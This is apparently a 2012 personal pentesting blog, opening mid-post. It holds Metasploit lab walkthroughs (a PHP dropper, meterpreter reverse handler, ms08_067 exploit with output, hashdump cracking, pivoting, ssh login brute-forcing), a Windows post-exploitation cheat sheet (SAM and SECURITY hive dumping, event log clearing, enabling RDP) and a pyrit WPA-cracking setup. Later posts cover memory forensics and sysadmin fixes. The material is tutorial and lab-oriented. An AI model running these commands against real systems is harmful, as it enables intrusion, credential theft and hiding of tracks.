  • cat /root/Tools/meh.php
<?php
system("runme.exe");
?>
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
  • Open a Terminal and
wget http://172.16.128.3/meh.php
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 10.1.87.1 255.255.255.0 2
  • Scan subnet using arpscan
run arp_scanner -r 10.1.87.1/24
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r 10.1.87.5
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j

That's all for now..
Stay tuned :)

Friday, 4 May 2012

Volatility taster


On our BackTrack system, let's set up a quick Samba share to accept the memory dump:
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment all the shares and add just the following)
[btshare] 
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On our target system open the USB stick that has DEFT in it.
Run deft extra and decide where your audit log will go
Go to Acquire and launch the trusted shell in order to run win32dd or win64dd
  • win64dd /r /f \\192.168.1.7\btshare\win7memory.img
  • cd /root/Tools/
  • svn checkout http://volatility.googlecode.com/svn/trunk Volatility
  • cd Volatility
  • chmod +x vol.py
  • ./vol.py -f /btshare/win7memory.img imageinfo
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 pslist
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connections
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connscan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivescan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivelist 0x031da010

More to come :)

Saturday, 28 April 2012

pyrit on Fedora 16

So yeah... finally the new workstation arrived, so let's install pyrit and see what that GPU can do :) So let's go..



yum install make gcc-c++ freeglut-devel libXi-devel libXmu-devel

ln -s /usr/lib64/nvidia/libcuda.so /usr/lib64/libcuda.so && ln -s /usr/lib64/nvidia/libcuda.so.1 /usr/lib64/libcuda.so.1

export LD_LIBRARY_PATH=/usr/local/cuda/lib:/usr/local/cuda/lib64
echo $LD_LIBRARY_PATH

cd /etc/ld.so.conf.d/

echo "/usr/local/cuda/lib64" >> cuda.conf
echo "/usr/local/cuda/lib" >> cuda.conf

ldconfig

yum --enablerepo=updates-testing install pyrit

wget http://developer.download.nvidia.com/compute/cuda/4_2/rel/toolkit/cudatoolkit_4.2.9_linux_64_fedora14.run

chmod +x cudatoolkit_4.2.9_linux_64_fedora14.run

./cudatoolkit_4.2.9_linux_64_fedora14.run

cd /usr/local/src/

wget http://pyrit.googlecode.com/files/cpyrit-cuda-0.4.0.tar.gz

tar -zxvf cpyrit-cuda-0.4.0.tar.gz

rm -rf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0/

python setup.py build

python setup.py install

pyrit list_cores
#1:  'CUDA-Device #1 'GeForce GTX 550 Ti''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'
#5:  'CPU-Core (SSE2)'
#6:  'CPU-Core (SSE2)'
#7:  'CPU-Core (SSE2)'
#8:  'CPU-Core (SSE2)'

pyrit benchmark
Computed 14121.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 550 Ti'': 12473.9 PMKs/s (RTT 2.8)
#2: 'CPU-Core (SSE2)': 424.3 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2)': 428.5 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 424.6 PMKs/s (RTT 3.1)
#5: 'CPU-Core (SSE2)': 428.2 PMKs/s (RTT 3.2)
#6: 'CPU-Core (SSE2)': 417.9 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 409.9 PMKs/s (RTT 3.0)
#8: 'CPU-Core (SSE2)': 410.8 PMKs/s (RTT 3.1)


Not bad at all!! :) Stay tuned for more

Friday, 30 March 2012

Windows CMD line cheat sheet (hunter-gatherer)


Another quick note, this time for the Windows command line; this is pretty much a shortlist of things I found interesting in Rob Fuller's Google doc..



Generic Commands
whoami /all Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
systeminfo Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta Displaying information about RDP sessions. /CONNECT can be added
qprocess * Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name.
schtasks /query /fo csv /v > %TEMP% Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a closer look.
net start
OR
sc query
Lists services
sc getkeyname “XXXXX” You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
sc queryex “XXXXX” Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
tasklist /m  or tasklist /m blah.dll Lists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
Kill processes by name or pid (with force option)
fsutil fsinfo drives Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" Locates insecurely registered executables within the system registry on Windows 7.
netstat -nabo netstat with process exe
netstat -na | findstr :445 just like grep :)
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain Lists all of the domain users
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain as this was supposed to use localgroup & domain, this is actually another way of getting *current* domain admins
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc query display services /state type and other info
rundll32.exe user32.dll, LockWorkStation lock the screen (that WOULD piss people off!!)
wscript.exe <script js/vbs> run things...
cscript.exe <script js/vbs/c#> run more things..


Remote access
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f Enable remote assistance


Reg Commands
reg save HKLM\Security security.hive   Save security hive to a file
reg save HKLM\System system.hive Save system hive to a file
reg save HKLM\SAM sam.hive Save sam to a file
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] What it says on the tin
reg export [RegDomain]\[Key] [FileName] What it says on the tin
reg import [FileName ] What it says on the tin
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] ( ) You can to add /s for recurse all values


Deleting Logs
wevtutil el List logs
wevtutil cl <LogName> Clear specific log
del %WINDIR%\*.log /a /s /q /f What it says on the tin


Non interactive pkg management
wmic product get name /value Get the name
wmic product where name="XXX" call uninstall /nointeractive Uninstall
pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” Install Telnet Service
pkgmgr /iu:”TelnetClient” Install the client



Stay tuned for more :)

Friday, 23 March 2012

Metasploit enumerating

Continuing from here...

You have your hosts scanned and added in your msf database so... lets go banner grabbing :)

  • msfconsole

  • use auxiliary/scanner/smb/smb_version 
  • services -p 445 -R 
  • run 

  • use auxiliary/scanner/http/http_version 
  • services -p 80 -R 
  • run 

  • use auxiliary/scanner/postgres/postgres_version 
  • services -p 5432 -R 
  • run

  • use auxiliary/scanner/mysql/mysql_version 
  • services -p 3306 -R 
  • run


If you re-run hosts and services you will see a more up to date listing of the services the scripts picked up :)

to be continued..

Wednesday, 21 March 2012

Metasploit vs SMB


Continuing from the previous post (scanning)

Our hosts output is not very rewarding as is... so since we are looking for Windows SMB vulnerabilities, let's look at getting some version info

  • msfconsole> use auxiliary/scanner/smb/smb_version
  • services -p 445 -R
  • show options (increase the number of threads according to your flavor and make sure that your services -p 445 -R worked fine)
  • exploit
[*] 10.1.87.129:445 is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:WIN2K3) (domain:WORKGROUP) 
[*] Scanned 1 of 3 hosts (033% complete) 
[*] 10.1.87.133:445 is running Windows Server 2008 R2 Enterprise (Build 7600) (language: Unknown) (name:WIN2K8R2-ENT) (domain:WORKGROUP) 
[*] Scanned 2 of 3 hosts (066% complete) 
[*] 10.1.87.137:445 is running Windows XP Service Pack 3 (language: English) (name:CISLAB) (domain:WORKGROUP) 
[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed
  • hosts (notice that the new info found its way in the database and appears now on the main list)
  • services -p 445 (same here :D )
  • back (we had our fill of that module lets try something else)
  • search type:exploit port:445 
  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi
  • services -p 445 (pick one.. this module does not have an RHOSTS option but an RHOST option)
  • set rhost 10.1.87.129
  • exploit
[*] Started reverse handler on 10.1.87.128:4444  
[*] Automatically detecting the target... 
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown 
[*] We could not detect the language pack, defaulting to English 
[*] Selected Target: Windows 2003 SP2 English (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 10.1.87.129 
[*] Meterpreter session 1 opened (10.1.87.128:4444 -> 10.1.87.129:1055) at 2012-03-19 21:21:30 +0000
meterpreter > (Kaboom!) 
  • run winenum ( be patient... it will create a directory.. in this case /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341 and will put all the information you want from that host there)
  • background (it will leave the session open and send you back to the msfconsole prompt)
  • cd /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341
  • ls
  • cat hashdump.txt (you could just run hashdump in the meterpreter session I know but we take the long way this time...)
  • take the Admin hash and use the rainbow tables provided online by http://www.onlinehashcrack.com 
  • sessions (will show you your active sessions) 
  • sessions -i 1 (will take you back to the active session on the 2003 box)


Stay tuned for more :P

Monday, 19 March 2012

Metasploit scanning

Some quick notes :)

Importing from nmap (ol skul)
  • db_status (make sure that your postgres is connected)
  • hosts (it should be empty)
  • nmap -sT -P0 -O --open -oX 10.1.87-range.xml 10.1.87.1/24 (on the command line)
  • db_import /root/10.1.87-range.xml (or you can cd and ls to find the exact location and filename from your msf> console)
  • hosts (you should be able to see the hosts nmap has found)
  • services (it will show you the open ports on the found systems)
  • services -s ssh (break it down using the service name)
  • services -p 22 (break it down using the port number)
  • services -p 22 -R (When attacking multiple hosts or enumerating try this to load all the matching hosts to your RHOST option automagically)
  • hosts -d (to clear all imported hosts)
Using nmap through msfconsole (for the itchy junkie)
  • db_nmap -sT -P0 -O --open 10.1.87.1/24 
  • hosts (the itch stops)
The extra-quick way (usually == sloppy)
  • search portscan
  • use auxiliary/scanner/portscan/tcp 
  • set rhosts 10.1.87.1/24 
  • set threads 100 
  • set ports 445 80 21-25 110 139 143 8080 9090 8443 443 135 3389
  • run


to be continued...

Tuesday, 13 March 2012

Debian - rpm cheat sheet

Working with BackTrack has its advantages, but having spent most of my adult life with Slackware and RedHat-based distros... I have found the following useful on many occasions

RedHat                    Debian                    Description
rpm -ivh {rpm-file}       dpkg -i {deb-file}        Install the package
rpm -Uvh {rpm-file}       Use apt-get :P            Upgrade package
rpm -ev {package}         dpkg -r {package}         Erase/remove an installed package
rpm -ql {package}         dpkg -L {package}         List all files of a package
rpm -qa                   dpkg -l {package}         List all installed packages
rpm -qi {package}         dpkg -p {package}         Display package information with version and short description
rpm -qf {/path/to/file}   dpkg -S {/path/to/file}   Find out what package a file belongs to


Thanks for playing :)

Sunday, 11 March 2012

Backtrack 5 and ASUS TFT101

Since the tablet got rooted there are all kinds of beautiful things we can do with it :) One of those being BackTrack 5. Very easy to install (thanks to secmaniac)

Steps:

Download BT5 for ARM on your PC from here

Unzip the 7z file and copy its contents in your memory card

On the tablet download and install ASTRO file manager (it has the unzip function you will need later)

While you're at it download and install PocketCloud (you will need it to VNC into the BT5 box later)

If you don't have one already, get a Terminal emulator as well (yes, you need that too)

Go to the ASTRO file manager and find the directory you have bt5 on the memory card (/Removable/MicroSD/bt5).

Copy it to your Internal memory under /sdcard/ (we need to unzip the image and the file is more than the 4GB your FAT32 memory card can support)

Go into the bt5 directory you just copied over and unzip the bt5.img.gz (Extract To This Directory) file (it will take a while go make yourself a cup of tea or something.. [even if it does not show the progress it is still unzipping.. so wait until the file reaches 5GB])

Close ASTRO file manager, open up your Terminal Emulator and run:
su
cd /sdcard/bt5
cp busybox ../
sh installbusybox.sh
( If you are using the Terminal Emulator Vol-UP+t is tab completion in case you are wondering..)
sh bootbt 
Now you should have a # prompt on the bt5 system; it's time to change your VNC password.
vncpasswd
Go ahead and  start the VNC session now (you can end it with stopvnc)
startvnc
Now you can VNC from your box or from the tablet itself to port 5901 with the password you set, and play :)


NOTE: DO NOT run apt-get update/upgrade/dist-upgrade; packages are not working 100% yet and you will lose stuff (stuff like gnome-terminal and firefox!)

Thanks for playing :)

Saturday, 10 March 2012

Backtrack notes

Some quick notes on BackTrack 5 RC2. Just some things that need to be done on a fresh install..



Metasploit:
cd /opt/framework/lib/ (or /opt/metasploit/common/lib)
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8.bak
mv libssl.so.0.9.8 libssl.so.0.9.8.bak
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8 
msfupdate 

Autologin:
apt-get install rungetty
vi /etc/init/tty1.conf (comment last line and add)
exec /sbin/rungetty tty1 --autologin root
echo "startx" >> /root/.bash_profile

Icon fix:
gconftool -s /apps/metacity/general/button_layout -t string :minimize,maximize,close

Office:
apt-get install python-software-properties
add-apt-repository ppa:libreoffice/ppa
apt-get update
apt-get install libreoffice

more to come...

Cheers :)

raid-check mismatch count

Let's see…

You have a server with soft raid (unfortunately, but you're gonna have to live with it!) and you get the unfortunate email:

/etc/cron.weekly/99-raid-check:
WARNING: mismatch_cnt is not 0 on /dev/md0

Step 1: Don't panic ;)

Step 2: Troubleshooting

cat /sys/block/md0/md/mismatch_cnt

You should be seeing a number there other than the good 0, so

cat /sys/block/md0/md/sync_action

should be idle… so let's wake it up:

echo repair > /sys/block/md0/md/sync_action
echo check > /sys/block/md0/md/sync_action
cat /proc/mdstat

All looks well in the world and

cat /sys/block/md0/md/mismatch_cnt

is 0 this time ;)

Cheers :)